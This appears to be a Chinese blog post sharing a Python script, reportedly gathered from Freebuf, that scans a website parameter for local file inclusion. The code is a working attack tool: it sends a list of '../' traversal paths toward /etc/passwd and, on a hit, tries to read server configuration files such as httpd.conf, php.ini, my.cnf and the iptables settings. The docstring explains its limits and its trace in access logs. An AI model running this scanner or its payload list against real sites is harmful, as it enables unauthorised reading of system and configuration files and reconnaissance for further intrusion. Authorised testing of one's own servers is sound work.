用Python写的检测本地文件包含的小工具,可以根据自己的需求/经验自己添加文件路径:
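#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Check one URL parameter for local file inclusion (LFI) by response length.

Usage: py_detect_LFI.py <url>, where the URL ends in the parameter to test,
for example http://www.google.com/index.php?id=

How it works:
  1. Request a file name that should not exist and record the length of the
     response as the baseline "error page" length.
  2. Request each /etc/passwd candidate; a response whose length differs from
     the baseline is reported as found.
  3. For every reported candidate, repeat the request with /etc/passwd
     swapped for each configuration file path.

Limits a reader should keep in mind:
  * A length difference is only a hint. A page that echoes the parameter
    value, or any dynamic content, changes length without any file being
    included, so each reported path needs manual confirmation.
  * Every probe is a plain GET with the candidate path appended to the URL,
    so a run appears in the server's access log as a short burst of requests
    carrying "../" sequences and /etc/ paths in the parameter value.

Fixes relative to the published listing: the baseline length is now really
measured (the old read loop always ended with an empty buffer, so every
non-empty response was reported), whole bodies are compared instead of the
first chunk, HTTP error responses and network failures no longer abort the
run, a missing argument no longer raises IndexError, requests have a timeout,
connections are closed, and duplicate candidate paths are requested once.
"""
import sys

try:  # Python 2, which the listing was written for
    from urllib2 import HTTPError, urlopen
except ImportError:  # Python 3
    from urllib.error import HTTPError
    from urllib.request import urlopen

BANNER = (
    "-----------------------------------------------------",
    "| usage:py_detect_LFI.py site url |",
    "|this url like http://www.google.com/index.php?id= |",
    " writed by eip_0x[Freebuf],just 4 fun |",
    "-----------------------------------------------------",
)

CHUNK_SIZE = 4072   # read size used by the original listing
TIMEOUT = 10        # seconds; the original had no timeout and could hang

# A name that is not expected to exist; its response is the baseline.
MISSING_NAME = '/kfdsjkf7675637d.txt'


def dedupe(items):
    """Return *items* as a list with later duplicates dropped, order kept."""
    seen = set()
    kept = []
    for item in items:
        if item not in seen:
            seen.add(item)
            kept.append(item)
    return kept


# Candidate spellings of /etc/passwd, exactly as published (one is repeated).
PASSWD_PATHS = dedupe(['/etc/passwd','../etc/passwd','../../etc/passwd','../../../etc/passwd','../../../../etc/passwd','../../../../../etc/passwd','../../../../../../etc/passwd','../../../../../../../etc/passwd','../../../../../../../etc/passwd','../../../../../../../../etc/passwd','../../../../../../../../../etc/passwd','../../../../../../../../../../etc/passwd'])

# Configuration files tried after a candidate is reported, as published.
# NOTE(review): '/usr/local/apche/...' looks like a typo in the published
# list; it is left unchanged here.
CONFIG_PATHS = dedupe(['/usr/local/app/apache2/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/usr/local/app/apache2/conf/extra/httpd-vhosts.conf','/usr/local/app/php5/lib/php.ini','/etc/sysconfig/iptables','/etc/httpd/conf/httpd.conf','/etc/my.cnf','/etc/issue','/etc/redhat-release','/usr/local/apche/conf/httpd.conf','/etc/httpd/conf/httpd.conf'])


def read_length(conn):
    """Return the total number of bytes readable from file-like *conn*."""
    total = 0
    while True:
        chunk = conn.read(CHUNK_SIZE)
        if not chunk:
            return total
        total += len(chunk)


def fetch_length(url):
    """Return the body length of the response for *url*, or None on failure.

    An HTTP error status still carries a body (the error page), so it is
    measured like any other response. None means no response was obtained
    (malformed URL, connection failure, timeout).
    """
    try:
        conn = urlopen(url, timeout=TIMEOUT)
    except HTTPError as err:
        conn = err  # file-like: the error page body can be read from it
    except (IOError, ValueError):
        return None
    try:
        return read_length(conn)
    except IOError:
        return None
    finally:
        conn.close()


def differs(length, baseline):
    """Return True when a response was obtained and its length is not *baseline*."""
    return length is not None and length != baseline


def config_probe(hit_path, config_path):
    """Return *hit_path* with '/etc/passwd' replaced by *config_path*.

    This keeps whatever "../" prefix produced the reported candidate.
    """
    return hit_path.replace("/etc/passwd", config_path)


def main(argv):
    """Run the check against argv[1]; return a process exit status."""
    for line in BANNER:
        print(line)
    if len(argv) < 2:
        return 2  # the banner above already shows the usage

    base = argv[1]
    baseline = fetch_length(base + MISSING_NAME)
    if baseline is None:
        sys.stderr.write("no baseline response from %s\n" % base)
        return 1

    for path in PASSWD_PATHS:
        if not differs(fetch_length(base + path), baseline):
            continue
        print(path + " " + " this file has been found!!!!u r lucky and have fun!!!!")
        # Only after a candidate is reported are the configuration files tried.
        for path2 in CONFIG_PATHS:
            if differs(fetch_length(base + config_probe(path, path2)), baseline):
                print(path2 + " " + "this file has been found!!")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))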
如代码中所示,脚本是从Freebuf上搜集过来的,上面还有好多好东西,值得你去学习。